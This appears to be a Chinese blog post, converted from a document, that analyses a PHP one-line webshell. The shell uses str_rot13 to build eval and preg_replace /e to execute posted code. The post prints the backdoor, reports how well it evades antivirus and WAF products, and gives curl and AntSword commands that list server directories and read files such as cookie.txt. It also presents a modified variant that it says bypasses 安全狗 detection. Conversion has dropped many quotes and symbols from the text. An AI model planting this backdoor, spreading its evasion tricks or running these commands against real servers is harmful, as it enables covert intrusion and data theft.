PHP一句话木马分析 conv.docxVIP

一只有趣的PHP小马

11/15/2019

最近看到一个php后门，后门代码如下，感觉还是很强大的，后门代码如

下：

?php($b4dboy=$_POST[b4dboy])

@preg_replace(/ad/e,@.str_rot13(riny).($b4dboy),add);?

免杀效果

乍一看还真不知道该怎么去利用，查了下相关资料，首先利用D盾去扫描

提示，如下

只是发现可以的str_rot13函数且级别只是1，在线检测了下，只有两个杀

软报毒，免杀还是很不错的,

安全狗还是能查杀出来的，并且会对菜刀和蚁剑连接进行拦截，所以在扫

描web马时，除了D盾外，也可以试试安全狗。

小马介绍

能过这么多杀软主要是因为利用了str_rot13函数，str_rot13(riny)输

出为eval，还有一个利用了preg_replace函数，该函数结构如下

preg_replace ( mixed pattern, mixed replacement, mixed subject

[, int limit])

/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代

码来执行，要保证 replacement 构成一个合法的 PHP 代码字符串，该正

则在被正确的匹配到后，传入的string被当做函数来运行。

测试发现该后门可用于php版本5.3、5.4;PHP5.5.0起，传入\e修

饰符的时候，会产生一个 E_DEPRECATED 错误；PHP7.0.0起，会

有 E_WARNING 错误，同时\e也无法起效。

小马连接方式

?利用hackerbar连接

此处传入的system(ls)，可成功返回数据，如下图

在利用file_get_contents在进行文件读取时发现，利用echo无法打印，

但是print可以

?利用curl连接

利用curl扫描目录获取相关信息：

curl31/test1.php--datab4dboy=print_r

(scandir(/var/www/html,1))

读取文件内容：

curl31/test1.php--datab4dboy=print

file_get_contents(cookie.txt)

curl31/test1.php--datab4dboy=\echo

file_get_contents(cookie.txt);\

?中国蚁剑连接

先来看下蚁剑这个payload：

b4dboy=(eval($_POST[1]);)1=var_dump(1);需要配置下蚁剑的body

才能连接

拦截蚁剑连接shell的数据包，本次抓取的获取phpinfo信息的数据包，

精简后数据包如下：

在连接其他shell的时候直接指定密码即可，不需要指定body，常规的一

句话马获取phpinfo拦截数据包如下可返回正常数据：

本次测试的后门利用该方法获取info，只是返回200，但无相关内容

但是将数据包改为123=phpinfo();die();b4dboy=(eval($_POST[123]))，

即可成功返回数据

一直在纠结为什么必须要在post包中在增加个eval呢，通过本地测试发现，如果不加的话输出如下，发现preg_replace函数语法错误

如果手动加上eval后，preg_replace函数相当于直接输出了执行后的结

果，也就不会报错了

小马改良版

那么这样的话是不是把后门中的eval删除，也能利用蚁剑连接成功？后门

修改如下确实可连接成功

先开启安全狗检测下看看，竟然没有检测出来，哈哈

然后连接下试试，安全狗竟然没有拦截，蚁剑可以成功连接。。。。。

利用hackerbar也可以正常获取文件

但是在利用file_get_contents()函数进行文件读取时，发现竟然没有数

据，查了半天，无意间看了下网页源码，好吧竟然在源码中

查找相关资料发现，echo不是一个函数，所以无法直接进行调用，如果想利用

acho打印，需要修改格式如下：